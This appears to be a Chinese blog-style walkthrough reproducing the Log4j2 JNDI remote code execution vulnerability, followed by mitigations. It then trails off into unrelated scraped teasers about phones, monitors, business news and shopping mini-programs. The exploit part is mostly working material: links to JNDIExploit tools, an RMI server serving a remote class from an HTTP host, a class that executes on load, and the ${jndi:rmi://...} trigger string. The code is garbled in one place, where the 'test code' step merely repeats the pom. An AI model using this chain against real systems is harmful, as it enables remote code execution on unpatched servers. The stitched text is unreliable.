令无数程序员加班的Log4j2远程执行漏洞复现
构建maven项目引入Log4j2编写 pom 文件<?xml version="1.0" encoding="UTF-8"?> 4.0.0 org.example Log4j-rce 1.0-SNAPSHOT org.apache.logging.log4j log4j-core 2.13.3 org.apache.logging.log4j log4j-api 2.13.3 8 8 编写测试代码<?xml version="1.0" encoding="UTF-8"?> 4.0.0 org.example Log4j-rce 1.0-SNAPSHOT org.apache.logging.log4j log4j-core 2.13.3 org.apache.logging.log4j log4j-api 2.13.3 8 8 下载 JNDI 测试服务器
到 https://github.com/feihong-cs/JNDIExploit
或者
https://github.com/welk1n/JNDI-Injection-Exploit
下载 JNDIExploit 测试服务器
本次使用 JNDIExploit 举例
下载完成后使用 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip
启动服务器
然后运行之前的Log4j2项目即可出现如图所示效果
加载运行自己的 class 类编写 RMI服务器import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.Reference; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; /** * @author Pu Zhiwei * create 2021-12-11 22:06 */ public class RMIServer { public static void main(String[] args) { System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true"); System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true"); try { LocateRegistry.createRegistry(1099); Registry registry = LocateRegistry.getRegistry(); System.out.println("Create RMI registry on port 1099!"); // 前两个参数为类名,第三个参数为远程类地址 Reference reference = new Reference("Test", "Test", "http://192.168.0.105:8080/"); ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); registry.bind("evil", referenceWrapper); } catch (Exception e) { e.printStackTrace(); } } }
编写测试类 public class Test { static { System.out.println("你好 Log4j2"); } }
然后启动一个 http 服务器,将编译好的测试类放入 http 服务器的根目录,你可以直接使用python的http服务器 python -m http.server 8080
修改 Log4j2 项目内容为 logger.error("${jndi:rmi://192.168.0.105:1099/evil}");
运行项目即可看到 Test 类已被执行
之后你就可以通过修改 Test 类实现更多操作。 如何防范
升级 Log4j2 到最新版本
使用最新版 JDK
临时解决方案: 设置 jvm 参数 "-Dlog4j2.formatMsgNoLookups=true" 在项目 classpath 目录下添加 log4j2.component.properties 配置文件,设置 log4j2.formatMsgNoLookups=true 设置系统环境变量:"LOG4J_FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS" 设置为 "true"
大屏娱乐新旗舰魅族16T深度体验一前言截至目前为止,没有魅蓝的魅族在魅族16系列上一共发行了7款机型魅族16th魅族16thPlus魅族16X魅族16Xs魅族16s魅族16sPro和魅族16T,这几款机型的每次发
专为电竞而生ZOWIEGEARXL2540职业电竞显示器详细评测在此前PUBGCSGO的很多电竞比赛中,ZOWIEGEARXL系列职业电竞显示器成为了专用显示器,同时许多职业电竞玩家在平时训练的时候都将ZOWIE显示器作为训练机来用,由此也可以
安全上网又省心360家庭防火墙路由器V5S增强版深度体验路由器作为家中不可缺少的数码产品,其信号稳定性是购买路由器的一个重要指标,但是一般的路由器都忽视了安全防护这一指标。尤其家中有老人的上网用户,有时候很难甄别网络欺诈陷进,在浏览网页
洁盟视洁杯JP360超声波清洗机体验站着洗才有范儿对于戴眼镜人士来说,如果长时间不擦拭眼镜,眼镜就会出现发糊现象,如果你经常选择眼镜布来擦拭的话,在眼镜布是干净的情况下,可以把眼镜镜面擦得锃光瓦亮,但是眼镜布长时间没有清洗,擦过眼
清仓跑路生变?潘石屹得迈过什么坎?一个多月前确认要卖出SOHO中国后,潘石屹就关闭微博评论,不再更新动态,难道他早就预料到,此番出售不会一帆风顺?本文由无冕财经(wumiancaijing)原创发布作者方斯嘉编辑陈
互联网大厂集体焦虑抢人,谁能突围史上最大规模校招?从公司层面来看,结合公司业务,提前布局储备未来可能需要的人才,是公司得以长期发展的关键一环,这也就不难理解美团对校招和内部培养的重视。本文由无冕财经(wumiancaijing)原
四大名塔四大名楼四大名塔具体指的是嵩岳寺塔(河南登封嵩岳寺)飞虹塔(山西洪洞广胜寺)释迦塔(山西应县佛宫寺)千寻塔(云南大理崇圣寺)。四大名楼是一种泛称,特指山西永济鹳雀楼,江南三大名楼(湖北武汉
十二月花神十二月花神扬眉十二花神次第来,人间月月花儿开,花团锦簇彤彤日,笑逐颜开喜心怀。在百花的传说中,以农历中的十二个月令的代表花,于是十二月令花神的传说最令人神往。十二花神是中国民间传说
案例分享鲜花店小程序的搭建与营销策略,拯救你的店铺销量各行各业都已经通过小程序实现线上转型。对于鲜花行业,如何搭建小程序并运营好,接下来,得有店分享一个客户案例,对同行在做小程序过程中,还是有很大的借鉴意义的。花千古,是一家昆明鲜花店
你真的知道如何运营私域流量吗?看看这3步你懂不懂近年来,互联网红利逐渐被瓜分,流量的获取也是越来越难,商家开始转向私域流量的运营,但是你真的知道如何运营私域流量吗?如果不理解,就看和我一起学习一下吧!一为什么要做私域流量运营?私
商城类小程序怎么做?牢记这四点搭建技巧很重要小程序发展至今,类型也是不断涌现,资讯类游戏类社交类电商类等等,各种商家都希望运用小程序为自己带来流量,特别是商城类小程序,不但可以打通线上线下销售渠道,提升店铺销量,而且可以为店